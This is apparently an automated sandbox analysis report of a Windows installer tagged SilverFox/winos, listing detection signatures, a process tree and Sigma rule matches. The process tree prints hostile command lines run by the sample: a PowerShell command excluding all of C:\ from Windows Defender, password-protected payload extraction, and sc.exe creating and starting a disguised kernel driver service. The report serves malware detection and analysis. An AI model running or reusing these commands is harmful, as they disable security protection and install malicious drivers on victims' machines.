Windows Analysis Report
#U5b89#U88c5#U52a9#U624b_1.0.8.exe

Overview

General Information

Sample name: #U5b89#U88c5#U52a9#U624b_1.0.8.exe (renamed because original name is a hash value)
Original sample name: _1.0.8.exe
Analysis ID: 1579603
MD5: eb985a9c4c8c2ddc4b039f64b520fca9
SHA1: c96d6e0868dd3248261232bd53943abfa074ffce
SHA256: 830caf16e52e098717a16ce8b2bda28f9a268746be2c77a6098e83941067b31c
Tags: exe, SilverFox, winos, user-kafan_shengui

Detection

Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • #U5b89#U88c5#U52a9#U624b_1.0.8.exe (PID: 2916 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe" MD5: EB985A9C4C8C2DDC4B039F64B520FCA9)
    • #U5b89#U88c5#U52a9#U624b_1.0.8.tmp (PID: 4464 cmdline: "C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp" /SL5="$302A6,4752846,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe" MD5: 9902FA6D39184B87AED7D94A037912D8)
      • powershell.exe (PID: 4284 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 7760 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U52a9#U624b_1.0.8.exe (PID: 3132 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe" /VERYSILENT MD5: EB985A9C4C8C2DDC4B039F64B520FCA9)
        • #U5b89#U88c5#U52a9#U624b_1.0.8.tmp (PID: 928 cmdline: "C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp" /SL5="$20456,4752846,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe" /VERYSILENT MD5: 9902FA6D39184B87AED7D94A037912D8)
          • 7zr.exe (PID: 5776 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 7180 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 7188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 560 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2908 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7260 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7276 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7292 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7320 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7372 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7396 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7448 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7464 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7516 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7532 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7576 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7592 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7644 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7656 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7708 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7724 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7752 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7788 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7868 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7888 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7944 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7960 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8008 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8028 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8076 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8100 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8148 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8164 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4464 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7176 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7256 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7244 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7272 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7288 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7284 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7324 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7372 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7408 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7448 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7512 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7524 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7572 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7576 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7616 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7644 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7696 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7796 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7724 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7816 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7824 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7916 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7932 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7988 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7996 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8068 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8060 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8112 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8124 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8088 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2916 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4464 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5776 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4544 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7232 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7264 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp" /SL5="$302A6,4752846,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp, ParentProcessId: 4464, ParentProcessName: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 4284, ProcessName: powershell.exe
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 560, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 2908, ProcessName: sc.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp" /SL5="$302A6,4752846,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp, ParentProcessId: 4464, ParentProcessName: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 4284, ProcessName: powershell.exe
Source: Process started | Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community | Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 560, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 2908, ProcessName: sc.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp" /SL5="$302A6,4752846,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp, ParentProcessId: 4464, ParentProcessName: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 4284, ProcessName: powershell.exe
No Suricata rule has matched


AV Detection

Source: Submitted Sample | Integrated Neural Analysis Model: Matched 89.7% probability
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb | source: 7zr.exe, 0000000B.00000003.1818402436.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000B.00000003.1818525168.0000000003180000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.11.dr
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Code function: 5_2_6C9FAEC0 FindFirstFileA,FindClose,FindClose,5_2_6C9FAEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_00A66868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,9_2_00A66868
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_00A67496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,9_2_00A67496
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.dr | String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
